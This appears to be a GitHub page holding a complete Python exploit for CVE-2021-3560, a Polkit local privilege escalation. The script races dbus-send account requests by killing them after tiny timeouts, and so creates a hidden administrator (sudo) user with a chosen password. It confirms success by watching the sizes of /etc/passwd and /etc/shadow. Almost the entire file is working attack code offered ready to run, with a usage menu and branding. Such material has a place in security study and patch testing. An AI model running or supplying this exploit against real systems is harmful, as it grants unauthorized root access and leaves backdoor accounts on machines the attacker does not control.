-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathexploit-CVE-2021-3560.py
198 lines (152 loc) · 7.28 KB
/
exploit-CVE-2021-3560.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
#!/usr/bin/env python3
# Exploit Title: Polkit 0.0-0.118 - Local Privilege Escalation
# Date: 05/15/2022
# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)
# Vendor Homepage: https://gitlab.freedesktop.org/polkit/polkit/
# Software Link: https://www.freedesktop.org/software/polkit/releases/polkit-0.105.tar.gz
# Version: Polkit 0.0 - 0.118
# Tested on: Polkit 0.105 (Ubuntu 20.04.2 LTS)
# CVE: CVE-2021-3560
# Source: https://github.com/UNICORDev/exploit-CVE-2021-3560
# Description: It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user.
# Imports
import os
import subprocess
import sys
import time
# Class for colors
class color:
red = '\033[91m'
gold = '\033[93m'
blue = '\033[36m'
green = '\033[92m'
purple = '\033[35m'
no = '\033[0m'
# Print UNICORD ASCII Art
def UNICORD_ASCII():
print(rf"""
{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}
{color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no}
{color.red} |/| `--. {color.purple}Y {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}
{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_______|__{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}
""")
# Print exploit help menu
def help():
print(r"""UNICORD Exploit for CVE-2021-3560 (Polkit) - Local Privilege Escalation
Usage:
python3 exploit-CVE-2021-3560.py [-u <username> -p <password>]
python3 exploit-CVE-2021-3560.py -h
Options:
-u Custom username. Provide username to be created. (Optional)
-p Custom password. Provide password to be configured for user. (Optional)
-h Show this help menu.
""")
def loading(spins):
def spinning_cursor():
while True:
for cursor in '|/-\\':
yield cursor
spinner = spinning_cursor()
for _ in range(spins):
sys.stdout.write(next(spinner))
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\b')
# Check for dependencies
def dependencies():
deps = {'gnome-control-center':"apt install gnome-control-center",'openssl':"apt install openssl",'sudo':"apt install sudo"}
missingDep = False
for dep in deps:
if subprocess.call(['which',dep],stdout=subprocess.DEVNULL,stderr=subprocess.STDOUT) == 1:
print(f"{color.blue}ERRORED: {color.red}Missing dependency \"{dep}\". Try: \"{deps[dep]}\"{color.no}")
missingDep = True
if missingDep is True:
exit()
# Run the exploit
def exploit(username, password):
UNICORD_ASCII()
print(f"{color.blue}UNICORD: {color.red}Exploit for CVE-2021-3560 (Polkit) - Local Privilege Escalation{color.no}")
print(f"{color.blue}USERNAME: {color.gold}" + username + f"{color.no}")
print(f"{color.blue}PASSWORD: {color.gold}" + password + f"{color.no}")
loading(15)
# Check for dependencies
dependencies()
print(f"{color.blue}DEPENDS: {color.gold}Dependencies for exploit are met!{color.no}")
loading(15)
# Make sure we can access passwd & shadow file. (We will need to view the size of these later. . .)
if not os.path.isfile("/etc/passwd"):
print (f"{color.blue}ERRORED: {color.red}Unable to locate passwd file!{color.no}")
if not os.path.isfile("/etc/shadow"):
print (f"{color.blue}ERRORED: {color.red}Unable to locate shadow file!{color.no}")
# Gather passwd file size to determine when we successfully add a new user
passwd_size = subprocess.check_output("ls -l /etc/passwd | awk '{print $5}'", shell=True)
passwd_size = passwd_size.decode("utf-8")
passwd_size = int(passwd_size)
# Loop to create user through trial and error
counter = 0.001
create_user_cmd = ['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply','/org/freedesktop/Accounts','org.freedesktop.Accounts.CreateUser','string:' + username,'string:' + username,'int32:1']
while True:
counter = counter + 0.0001
create_user = subprocess.Popen(create_user_cmd, stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
try:
create_user.wait(timeout=counter)
create_user.kill()
except subprocess.TimeoutExpired:
create_user.kill()
if counter>0.05:
print(f"{color.blue}ERRORED: {color.red}User was not able to be created or already exists!{color.no}")
exit()
# Exit loop if passwd file changes in size
new_passwd_size = subprocess.check_output("ls -l /etc/passwd | awk '{print $5}'", shell=True)
new_passwd_size = int(new_passwd_size)
if new_passwd_size != passwd_size:
break
print(f"{color.blue}EXPLOIT: {color.gold}New user created!{color.no}")
loading(15)
# Generate password hash for new user
password_hash = subprocess.check_output(f"openssl passwd -5 {password}", shell=True)
password_hash = password_hash.decode("utf-8")
password_hash = password_hash[:-1]
user_id = subprocess.check_output("id -u " + username, shell=True)
user_id = user_id.decode("utf-8")
user_id = user_id[:-1]
print(f"{color.blue}PREPARE: {color.gold}New password hash generated!{color.no}")
# Gather shadow file size to determine if we successfully changed the password or not
shadow_size = subprocess.check_output("ls -l /etc/shadow | awk '{print $5}'", shell=True)
shadow_size = shadow_size.decode("utf-8")
shadow_size = int(shadow_size)
# Loop to add password to shadow file.
counter = 0.001
add_password_hash_cmd = ['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply','/org/freedesktop/Accounts/User' + user_id,'org.freedesktop.Accounts.User.SetPassword','string:' + password_hash,'string:' + username]
while True:
counter = counter + 0.0001
create_user = subprocess.Popen(add_password_hash_cmd, stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
try:
create_user.wait(timeout=counter)
create_user.kill()
except subprocess.TimeoutExpired:
create_user.kill()
if counter>0.05:
print(f"{color.blue}ERRORED: {color.red}Password hash was not able to be set or already exists!{color.no}")
exit()
# Exit if shadow file changes in size
new_shadow_size = subprocess.check_output("ls -l /etc/shadow | awk '{print $5}'", shell=True)
new_shadow_size = int(new_shadow_size)
if new_shadow_size != shadow_size:
break
print(f"{color.blue}EXPLOIT: {color.gold}Password configured for new user!{color.no}")
loading(15)
print(f"{color.blue}SUCCESS: {color.green}Created Sudo user \"{color.gold}{username}{color.green}\" with password \"{color.gold}{password}{color.green}\"!{color.no}\n")
exit()
if __name__ == "__main__":
args = ['-h','-u','-p']
username = 'unicord'
password = 'unicord'
if args[1] in sys.argv:
username = sys.argv[sys.argv.index(args[1]) + 1]
if args[2] in sys.argv:
password = sys.argv[sys.argv.index(args[2]) + 1]
if args[0] in sys.argv:
help()
else:
exploit(username, password)